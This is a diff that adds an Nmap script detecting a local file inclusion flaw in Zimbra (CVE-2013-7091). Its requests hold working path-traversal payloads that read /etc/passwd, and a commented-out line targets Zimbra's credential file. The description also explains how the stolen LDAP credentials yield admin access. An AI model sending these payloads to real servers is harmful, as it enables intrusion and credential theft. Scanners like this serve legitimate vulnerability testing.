diff options
Diffstat (limited to '')
-rw-r--r-- | scripts/http-vuln-cve2013-7091.nse | 121 |
1 files changed, 121 insertions, 0 deletions
diff --git a/scripts/http-vuln-cve2013-7091.nse b/scripts/http-vuln-cve2013-7091.nse new file mode 100644 index 0000000..9d35749 --- /dev/null +++ b/scripts/http-vuln-cve2013-7091.nse @@ -0,0 +1,121 @@ +local http = require "http" +local shortport = require "shortport" +local stdnse = require "stdnse" +local string = require "string" +local vulns = require "vulns" + +description = [[ +An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6. + +The vulnerability is a local file inclusion that can retrieve any file from the server. + +Currently, we read /etc/passwd and /dev/null, and compare the lengths to determine vulnerability. + +TODO: +Add the possibility to read compressed file. +Then, send some payload to create the new mail account. +]] + +--- +-- @usage +-- nmap -sV --script http-vuln-cve2013-7091 <target> +-- nmap -p80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra <target> +-- @output +-- PORT STATE SERVICE REASON +-- 80/tcp open http syn-ack +-- | http-vuln-cve2013-7091: +-- | VULNERABLE: +-- | Zimbra Local File Inclusion and Disclosure of Credentials +-- | State: VULNERABLE (Exploitable) +-- | IDs: CVE:CVE-2013-7091 +-- | Description: +-- | An 0 day was released on the 6th December 2013 by rubina119. +-- | The vulnerability is a local file inclusion that can retrieve the credentials of the Zimbra installations etc. +-- | Using this script, we can detect if the file is present. +-- | If the file is present, we assume that the host might be vulnerable. +-- | +-- | In future version, we'll extract credentials from the file but it's not implemented yet and +-- | the detection will be accurate. +-- | +-- | TODO: +-- | Add the possibility to read compressed file (because we're only looking if it exists) +-- | Then, send some payload to create the new mail account +-- | Disclosure date: 2013-12-06 +-- | Extra information: +-- | Proof of Concept:/index.php?-s +-- | References: +-- |_ http://www.exploit-db.com/exploits/30085/ +-- +-- @args http-vuln-cve2013-7091.uri URI. Default: /zimbra +--- + +author = {"Paul AMAR <aos.paul@gmail.com>", "Ron Bowes"} +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"exploit","vuln","intrusive"} + +portrule = shortport.http + +-- function to escape specific characters +local escape = function(str) return string.gsub(str, "%%", "%%%%") end + +action = function(host, port) + local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/zimbra" + + local vuln = { + title = 'Zimbra Local File Inclusion (Gather admin credentials)', + state = vulns.STATE.NOT_VULN, -- default + IDS = {CVE = 'CVE-2013-7091'}, + description = [[ +This script exploits a Local File Inclusion in +/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz +which allows us to see any file on the filesystem, including config files +that contain LDAP root credentials, allowing us to make requests in +/service/admin/soap API with the stolen LDAP credentials to create user +with administration privileges and gain access to the Administration Console. + +This issue was patched in Zimbra 7.2.6. +]], + references = { + 'http://www.exploit-db.com/exploits/30085/', + }, + dates = { + disclosure = {year = '2013', month = '12', day = '06'}, + }, + } + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + + local file_short = "../../../../../../../../../dev/null" + local file_long = "../../../../../../../../../etc/passwd" + --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml" + + local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" + local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" + + stdnse.debug1("Trying to detect if the server is vulnerable") + stdnse.debug1("GET " .. uri .. escape(url_short)) + stdnse.debug1("GET " .. uri .. escape(url_long)) + + local session_short = http.get(host, port, uri..url_short) + local session_long = http.get(host, port, uri..url_long) + + if session_short and session_short.status == 200 and session_long and session_long.status == 200 then + if session_short.header['content-type'] == "application/x-javascript" then + -- Because .gz format is somewhat odd, giving a bit of a margin of error here + if (string.len(session_long.body) - string.len(session_short.body)) > 100 then + stdnse.debug1("The website appears to be vulnerable a local file inclusion vulnerability in Zimbra") + vuln.state = vulns.STATE.EXPLOIT + return vuln_report:make_output(vuln) + else + stdnse.debug1("The host does not appear to be vulnerable") + vuln.state = vulns.STATE.NOT_VULN + return vuln_report:make_output(vuln) + end + else + stdnse.debug1("Bad content-type for the resource : " .. session_short.header['content-type']) + return + end + else + stdnse.debug1("The website seems to be not vulnerable to this attack.") + return + end +end |